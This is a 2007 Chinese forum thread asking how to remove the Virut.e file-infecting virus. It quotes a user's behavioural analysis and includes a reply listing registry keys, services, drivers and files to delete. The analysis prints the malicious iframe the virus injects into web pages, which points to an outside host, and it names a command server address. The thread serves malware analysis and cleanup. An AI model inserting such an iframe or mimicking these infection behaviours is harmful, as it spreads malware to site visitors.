Virus.Win32.Virut.e如何杀？

小宝rambo

卡巴报为Virus.Win32.Virut.e
但是好像杀不掉  
请问应该如何杀
下面是网友的分析
---------------------------------------------------------------------------------------------------------------------------------------
又一个恶意感染exe的类熊猫病毒的分析
今天从某个网友那里获得了一个病毒 据说是感染文件的 卡巴报为Virus.Win32.Virut.e（还不能查杀）
看病毒名估计是一个新的感染exe系列的变种
病毒文件名 VT100.exe
病毒大小 125952字节
MD5 35703ea7c752d959d2e9d904654a5522
编写语言 Delphi
此病毒特征：1.感染exe(包括系统分区）html htm php asp aspx 文件
2.结束一些杀毒软件进程
3.删除hosts文件
4.通过hook API函数 隐藏进程 隐藏文件自身及注册表中的启动项目
5.删除gho文件
总体上来看有点步李俊的后尘哦！
运行文件后
生成如下文件
C:\Windows\system32\VT100.exe
Hook 以下API函数Ntcreatefile
Ntcreateprocess
NtcreateprocessEx
NtEnumerateValueKey
NtQueryDirectoryFile
NtQuerySystemInformation
ZwCreateFile
ZwCreateprocess
ZwCreateprocessEx
ZwEnumerateValueKey
ZwOpenFile
ZwQueryDirectoryFile
使得C:\Windows\system32\VT100.exe在资源管理器下不可见
其进程在任务管理器中也不可见
后面提到的启动项目 在注册表编辑器中也不可见

注册表方面
添加HKLM\SOFTWARE\Microsoft\Tracing\FWCFG键
并在其下建立值
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\ConsoleTracingMask: 0xFFFF0000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\MaxFileSize: 0x00100000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileDirectory: "%windir%\tracing"
用意不懂 不过感觉应该和不断的停止防火墙的程序有关
我的防火墙就是被他不断的停止...
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面增加名称为VT100 Emulator的键值
指向 C:\Windows\system32\VT100.exe达到开机自启动的目的
删除C:\WINDOWS\system32\drivers\etc\hosts
和gho文件
如果有如下进程则结束
sfmantec antipirus（作者拼错了吧？呵呵）
ravmon.exe
zonealarm
rav_onclass
感染系统分区 （包括C:\WINDOWS\system32\dllcache\下面的文件）及其他分区的exe文件
使得被感染文件增加9728字节的内容

感染感染系统分区 （包括C:\WINDOWS\system32\dllcache\下面的文件）及其他分区的html htm php asp aspx 文件
在其内部添加如下代码
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
通过winlogon进程访问81.95.149.98:65520 可没找到插入winlogon的 dll ..

漫步白月光

如果有 删除这些注册表项目：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <333><C:\Syswm1i\svchost.exe>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <ltnward><; C:\WINDOWS\system32\ltnward.exe>  [N/A]
    <SoundService><rundll32.exe "C:\WINDOWS\system32\sfnwlufn.dll",setvm>  [N/A]
    <winform><C:\WINDOWS\winform.exe>  [N/A]
    <mppds><C:\WINDOWS\mppds.exe>  [N/A]
    <upxdnd><C:\DOCUME~1\ADMINI~1.47D\LOCALS~1\Temp\upxdnd.exe>  [N/A]
    <wsttrs><C:\WINDOWS\wsttrs.exe>  [N/A]
    <msccrt><C:\WINDOWS\msccrt.exe>  [N/A]
    <cmdbcs><C:\WINDOWS\cmdbcs.exe>  [N/A]
    <VT100 Emulator><C:\WINDOWS\system32\VT100.EXE>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{B187090E-3630-4961-BB2A-813C4FDE56EF}><C:\WINDOWS\system32\khffggg.dll>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\fade]
    <WinlogonNotify: fade><C:\WINDOWS\system32\Lntma32t.dll>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gebcb]
    <WinlogonNotify: gebcb><C:\WINDOWS\system32\gebcb.dll>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\khffggg]
    <WinlogonNotify: khffggg><khffggg.dll>  [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\rpcc]
    <WinlogonNotify: rpcc><C:\WINDOWS\system32\rpcc.dll>  [N/A]

删除这两个服务：
[Windows SystemDown / WindowsDown][Stopped/Auto Start]
  <C:\WINDOWS\system32\servet.exe><N/A>
[Client IP-IPX / Client IP-IPX][Stopped/Auto Start]
  <"C:\WINDOWS\system32\svchosts.exe" -e te-110-12-0000122><N/A>

删除这三个驱动程序：
[EXAMPLE / EXAMPLE][Stopped/System Start]
  <\??\C:\WINDOWS\system32\main.sys><N/A>
[kgofogl / kgofogl][Running/Boot Start]
  <\SystemRoot\\SystemRoot\System32\drivers\kgofogl.sys><N/A>
[Runtime / Runtime][Running/Manual Start]
  <\??\C:\WINDOWS\System32\drivers\runtime.sys><N/A>

删除这些浏览器加载项：
[]
  {0676624D-2467-4400-A629-C97AB2F3C368} <C:\WINDOWS\system32\gebcb.dll, N/A>
[]
  {57E218E6-5A80-4f0c-AB25-83598F25D7E9} <C:\WINDOWS\system32\wogpyhvx.dll, N/A>
[]
  {B187090E-3630-4961-BB2A-813C4FDE56EF} <C:\WINDOWS\system32\khffggg.dll, N/A>
[]
  {0676624D-2467-4400-A629-C97AB2F3C368} <C:\WINDOWS\system32\gebcb.dll, N/A>
[]
  {57E218E6-5A80-4F0C-AB25-83598F25D7E9} <C:\WINDOWS\system32\wogpyhvx.dll, N/A>
[]
  {B187090E-3630-4961-BB2A-813C4FDE56EF} <C:\WINDOWS\system32\khffggg.dll, N/A>

结束进程：
C:\WINDOWS\system32\VT100.EXE

删除文件：
C:\WINDOWS\system32\VT100.EXE

重启后删除文件：
C:\WINDOWS\system32\gebcb.dll
C:\WINDOWS\system32\khffggg.dll
C:\WINDOWS\system32\jkkklif.dll
C:\WINDOWS\system32\Lntma32t.dll
C:\WINDOWS\system32\sfnwlufn.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\Documents and Settings\ADMINI~1.47D\Local Settings\Temp\upxdnd.dll
C:\WINDOWS\system32\wogpyhvx.dll
C:\Syswm1i\svchost.exe
C:\WINDOWS\system32\ltnward.exe
C:\WINDOWS\winform.exe
C:\WINDOWS\mppds.exe
C:\Documents and Settings\ADMINI~1.47D\Local Settings\Temp\upxdnd.exe
C:\WINDOWS\wsttrs.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\system32\rpcc.dll
C:\WINDOWS\system32\servet.exe
C:\WINDOWS\system32\svchosts.exe
C:\WINDOWS\system32\main.sys
C:\WINDOWS\System32\drivers\kgofogl.sys
C:\WINDOWS\System32\drivers\runtime.sys
可以用冰刃辅助。如果楼主嫌麻烦 直接ghost

[ 本帖最后由 漫步白月光 于 2007-4-20 10:49 编辑 ]